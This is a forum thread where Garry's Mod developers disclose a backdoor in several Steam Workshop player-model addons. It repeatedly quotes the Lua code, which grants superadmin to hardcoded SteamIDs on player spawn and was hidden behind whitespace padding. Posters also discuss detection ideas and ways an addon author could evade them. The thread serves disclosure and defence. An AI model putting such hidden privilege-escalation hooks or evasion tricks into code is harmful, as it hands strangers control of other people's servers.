[PSA] Backdoor Found in "Suits and Robbers Player Models" Workshop Addon - Developers

[QUOTE=Acecool;47387351]Surely when you click on "ban" it gives you a link with the id? Why not farm the ids and make a Lua script, or GreaseMonkey script or something else which lets you mass ban or mark x to ban which saves to a file, and when you click on ban selected it reads the txt, bans and saves them in a banned folder?[/QUOTE] Have you ever tried out moderating tools on workshop? I don't think you did.

[QUOTE=Robotboy655;47387636]Have you ever tried out moderating tools on workshop? I don't think you did.[/QUOTE] I haven't but regardless of the methods used ( http GET / POST / JS, etc... ) there should be a way to write a library to read / write to a file using your JS knowledge with GreaseMonkey on Firefox to extend the tools to make managing them much easier.

[QUOTE=Acecool;47388080]I haven't but regardless of the methods used ( http GET / POST / JS, etc... ) there should be a way to write a library to read / write to a file using your JS knowledge with GreaseMonkey on Firefox to extend the tools to make managing them much easier.[/QUOTE] What Robotboy 'should' do and what should already be provided for him are two very different things. Not only that but given Valve tend to update certain things without even an ounce of notice, it'd turn in to a game of cat and mouse.

This addon ([URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293036066"]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that make him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua [CODE]function door1( ply ) if ( ply:SteamID() == "STEAM_0:1:47561717" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory1", door1) function door2( ply ) if ( ply:SteamID() == "STEAM_0:0:38951252" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory2", door2) function door3( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory3", door3) function door4( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory4", door4) function door5( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE]

[QUOTE=MajorAs;47393764]This addon ([URL]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that make him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua [CODE]function door1( ply ) if ( ply:SteamID() == "STEAM_0:1:47561717" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory1", door1) function door2( ply ) if ( ply:SteamID() == "STEAM_0:0:38951252" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory2", door2) function door3( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory3", door3) function door4( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory4", door4) function door5( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE][/QUOTE] Banned. [editline]25th March 2015[/editline] That user has a few bans for the exact same reason btw, might worth checking all of his addons.

[code]hook.Add("PlayerSpawn", "Backdoory1", door1)[/code] genius, at least it's fun when people try to do something creative to hide it

Just checked his other addons. Here are the ones with the same exact backdoor. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua) This guy should be banned from uploading/updating anything on the workshop.

[QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua) This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] The door tags script is a coderhire script aswell.

Is there a way to download gma files directly? I would like to write some script that would download all workshop items, extract them, and scan them using regex and stuff.

[QUOTE=edgarasf123;47397647]Is there a way to download gma files directly? I would like to write some script that would download all workshop items, extract them, and scan them using regex and stuff.[/QUOTE] You can download all workshop files through GMod through a script [sp] been there, horrible idea, trust me... [/sp] That will put the gma's into your addon folder, where there you can use an external program to check the folder etc. Just be careful, I fucked up one time and accidentally subscribed to the entire GMod workshop and apparently it broke a lot of peoples subscriptions. I also learnt that there isn't an unsubscribe all button, but than again, I learnt some web coding from it.

[QUOTE=AnonTakesOver;47397668]You can download all workshop files through GMod through a script [sp] been there, horrible idea, trust me... [/sp] That will put the gma's into your addon folder, where there you can use an external program to check the folder etc. Just be careful, I fucked up one time and accidentally subscribed to the entire GMod workshop and apparently it broke a lot of peoples subscriptions. I also learnt that there isn't an unsubscribe all button, but than again, I learnt some web coding from it.[/QUOTE] Yeah, that's why I'm asking if I can download them directly. There is [url]http://steamworkshopdownloader.com/[/url] but when I used it in the past it wouldn't download some items.

gma stores Lua in plain text so you wouldn't need to extract. You can use Lua to read the contents though, simply use file.Find( "*", v.title ); when using engine.GetAddons( ); ( still broken on server ) [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-170[/url] = read function from Lua file My fileio also builds lists of files ( which you can then simply open ): [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-276[/url] - this generates the file list - [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-303[/url] - and this one generates the stats list to read how many maps, etc are in the file... These are old but should help show the style: Together, they make lists like this: [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/addon_info_CLIENT.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/addon_info_SERVER.txt[/url] which is part of the usual structure I use: [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_cl.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_sh.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_sv.txt[/url] I've been thinking of making something to detect backdoors too since I am going to write something to automatically create wiki entries for my files ( hence the need for the Read Function command which also reads up for commands ( not all supported yet, but the newest version isn't up yet )... Either way, hopefully this helps. [editline]26th March 2015[/editline] engine.GetAddons( ) only works if you set the workshop as PUBLIC. Why can't private workshop collections be allowed, especially with the API key from the account that can view the workshop addon?? I'd like this to be implemented, please!

Ok, used simple python script to fetch workshop item id's. 19,000 pages to go. [vid]https://dl.dropboxusercontent.com/u/8081284/ShareX/2015/03/2015-03-26_00-12-20.mp4[/vid]

[QUOTE=MajorAs;47393764]This addon ([URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293036066"]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that make him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua [CODE]function door1( ply ) if ( ply:SteamID() == "STEAM_0:1:47561717" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory1", door1) function door2( ply ) if ( ply:SteamID() == "STEAM_0:0:38951252" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory2", door2) function door3( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory3", door3) function door4( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory4", door4) function door5( ply ) if ( ply:SteamID() == "STEAM_0:1:67615954" ) then ply:SetUserGroup("superadmin") end end hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE][/QUOTE] [QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua) This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] I looked in them too, they're still in there. He tried hiding them using 12KB of spaces and tabs ( few hundred lines down or so, then a few hundred tabs to the right )...

hmm, I think we should make a thread where we can report addons/sexdupes/other rule violations so we can clean the workshop of this shit. there should be a rule aswell that if you make a sex dupe or whatever that you should be permabanned from the gmod workshop :v:

[QUOTE=Acecool;47397922]I looked in them too, they're still in there. He tried hiding them using 12KB of spaces and tabs ( few hundred lines down or so, then a few hundred tabs to the right )...[/QUOTE] It was already like that I just made it more readable for the forum, instead of posting the whole 500 lines.

Reading this makes me wonder how many things I subscribed to have backdoors. Speaking of, I had a few people complain there are backdoors in my addons, but I'm pretty sure there is none.

[QUOTE=Vipes;47398017]Reading this makes me wonder how many things I subscribed to have backdoors. Speaking of, I had a few people complain there are backdoors in my addons, but I'm [B]pretty sure[/B] there is none.[/QUOTE] :v: [sp] I recommend you thoroughly check. [/sp]

[QUOTE=AnonTakesOver;47398027]:v: [sp] I recommend you thoroughly check. [/sp][/QUOTE] I have. The most complained one, my Halo 3 Pack, the only LUA in it is to make the models show in the playermodel chooser.

I've been wanting to create a form of anti-backdoor for a long time now; this could be achieved through a method which will allow us to prevent Lua from gma files from loading at all... I already have most of the back-end for it written ( build list of files from gma, compare against include or AddCSLuaFile; cache data so it can be processed; process; fix / blacklist / whitelist / etc.. CRC of file to prevent any changed which would require a fresh scan ). This could be part of my dev_base, dev_addon, or admin system / anti-cheat I'm writing or a new category... anti-root? If anyone wants to help, I'd like to build up a collection of backdoors that are in use or have been previously used to help build detection ( This will be a free addon / library / whatever because I can't stand why people would put a backdoor in their code in the first place... It's so shady ), please pm me any examples you have. I do have a few on file ( such as the one above, using string char / byte, and a few more somewhere...

[QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor. [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua) [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua) This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] Thanks, fixed. Unfortunately, it is impossible to "ban" someone from uploading to workshop. I could do this from GMPublish, but he 100% has friends who would do this for him + there are programs that circumvent GMPublish ( like gmosh? )

[QUOTE=Acecool;47398351]I've been wanting to create a form of anti-backdoor for a long time now; this could be achieved through a method which will allow us to prevent Lua from gma files from loading at all... I already have most of the back-end for it written ( build list of files from gma, compare against include or AddCSLuaFile; cache data so it can be processed; process; fix / blacklist / whitelist / etc.. CRC of file to prevent any changed which would require a fresh scan ). This could be part of my dev_base, dev_addon, or admin system / anti-cheat I'm writing or a new category... anti-root? If anyone wants to help, I'd like to build up a collection of backdoors that are in use or have been previously used to help build detection ( This will be a free addon / library / whatever because I can't stand why people would put a backdoor in their code in the first place... It's so shady ), please pm me any examples you have. I do have a few on file ( such as the one above, using string char / byte, and a few more somewhere...[/QUOTE] Have been worked on an anti-backdoor as well. Problem is that adminmods and addons like PAC and wiremod gets flagged. The best way I can think of, would be a list of functions the given addon would 'require', like apps on Google Play.

[QUOTE=Nak;47398431]Have been worked on an anti-backdoor as well. Problem is that adminmods and addons like PAC and wiremod gets flagged. The best way I can think of, would be a list of functions the given addon would 'require', like apps on Google Play.[/QUOTE] You can't really discover all backdoors with some script. Also if some anti-backdoor does go popular, people will just start disguising these backdoors. We should just get rid steam workshop and create seperate "gmod workshop", because authors can run random code on thousands of servers without owners knowledge. I'm thinking maybe integrating github so people can track changes made to the addon? It's less likely to happen, but it is still better idea than having a workshop full of backdoors.

[QUOTE=edgarasf123;47398536]You can't really discover all backdoors with some script. Also if some anti-backdoor does go popular, people will just start disguising these backdoors. We should just get rid steam workshop and create seperate "gmod workshop", because authors can run random code on thousands of servers without owners knowledge. I'm thinking maybe integrating github so people can track changes made to the addon? It's less likely to happen, but it is still better idea than having a workshop full of backdoors.[/QUOTE] Apart from you could detour the function (eg http.Fetch()) and bam backdoor for the most part has been destroyed. Same sort of thing with SetUserGroup(). Do you really need an addon to be setting those? Detour it and catch the SteamIDs :v: Hell it doesn't even matter if they're 'disguised', you can use the debug functions to trace back up. The only problem would be load order, but addons (I think?) are loaded after everything else, so as long as there's no other foul play you're fine.

[QUOTE=Teddi Orange;47399006]Apart from you could detour the function (eg http.Fetch()) and bam backdoor for the most part has been destroyed. Same sort of thing with SetUserGroup(). Do you really need an addon to be setting those? Detour it and catch the SteamIDs :v: Hell it doesn't even matter if they're 'disguised', you can use the debug functions to trace back up. The only problem would be load order, but addons (I think?) are loaded after everything else, so as long as there's no other foul play you're fine.[/QUOTE] Yes, but how are you going to differentiate with algorithm a legit code from malicious? Or are you implying to check each addon manually? The thing with workshop is that the author can update his addon with backdoor, do his malicious thing, and 1 hour later remove the backdoor without anyone noticing. There is no really a need of using http funcions because author can already run code without using http. And what about secret concommand that can run any lua?

[QUOTE=edgarasf123;47399041]Yes, [B]but how are you going to differentiate with algorithm a legit code from malicious?[/B] Or are you implying to check each addon manually? The thing with workshop is that the author can update his addon with backdoor, do his malicious thing, and 1 hour later remove the backdoor without anyone noticing. There is no really a need of using http funcions because author can already run code without using http...[/QUOTE] If you have an understanding of programming then you should know that there are cases that you can use to your own advantage to check for legitimate usage. There are certain functions that you know will be targeted and are typically not used (often) in a live environment. For example, how often is a user realistically going to be added as a 'superadmin' via SetUserGroup? Why not whitelist what concommands users can actually use (or at least, lua based ones). It's not impossible to do, it just requires cleaner code and people to actually not be lazy with their systems. This problem with blindly installing addons has existed for a long time, the main difference is getting the payload on to the system is just 10x easier because of workshop.

I don't know if this would be possible but it would be nice to make a review system where some selected users would be able to check if there is any backdoor in the lua files. Anyways, I don't think the devs can do this without modifications to the workshop from Valve and we can't expect Valve to do these modifications. PS: The addons would only go through this system if they have .lua files.

[QUOTE=Teddi Orange;47399113]If you have an understanding of programming then you should know that there are cases that you can use to your own advantage to check for legitimate usage. There are certain functions that you know will be targeted and are typically not used (often) in a live environment. For example, how often is a user realistically going to be added as a 'superadmin' via SetUserGroup? Why not whitelist what concommands users can actually use (or at least, lua based ones). It's not impossible to do, it just requires cleaner code and people to actually not be lazy with their systems. This problem with blindly installing addons has existed for a long time, the main difference is getting the payload on to the system is just 10x easier because of workshop.[/QUOTE] You don't have to use SetUserGroup, you can modify ULX data files using file.Write, or RunConsoleCommand, or some other multiple ways. Command whitelist is easy to bypass using one of the whitelisted term and overriding the command with your own, or adding custom ulx command. And overriding multiple function which changes its behavior is most likely going to break some addons for sure. Unless you're willing to spend years on addon whitelisting, the whitelisting idea is not the best solution. And as I said, the whole workshop is like a huge backdoor, the authors doesn't necessarily have to run a code to add himself as superadmin because he already has full control of the server trough LUA.

[QUOTE=edgarasf123;47399205]You don't have to use SetUserGroup, you can modify ULX data files using file.Write, or RunConsoleCommand, or some other multiple ways. Command whitelist is easy to bypass using one of the whitelisted term and overriding the command with your own, or adding custom ulx command. And overriding multiple function which changes its behavior is most likely going to break some addons for sure. Unless you're willing to spend years on addon whitelisting, the whitelisting idea is not the best solution. And as I said, the whole workshop is like a huge backdoor, the authors doesn't necessarily have to run a code to add himself as superadmin because he already has full control of the server trough LUA.[/QUOTE] The idea is to lock the environment down as much as you can, the suggestions I initially listed are somewhat the tip of the iceberg. Workshop is just another (easier) method of delivering the payload. The issue has existed for years otherwise through other methods, such as using the http functions (see: recent coughing epidemic). Anyone with intrinsic glua knowledge should already be detouring RunString (& CompileString) to make things far harder from the getgo. For as long as there's a way to insert yourself in to the lua environment, you're going to have these problems and going "well they still can do x" is a pretty terrible attitude to have. Minimising the risk is all you can do.

-snip-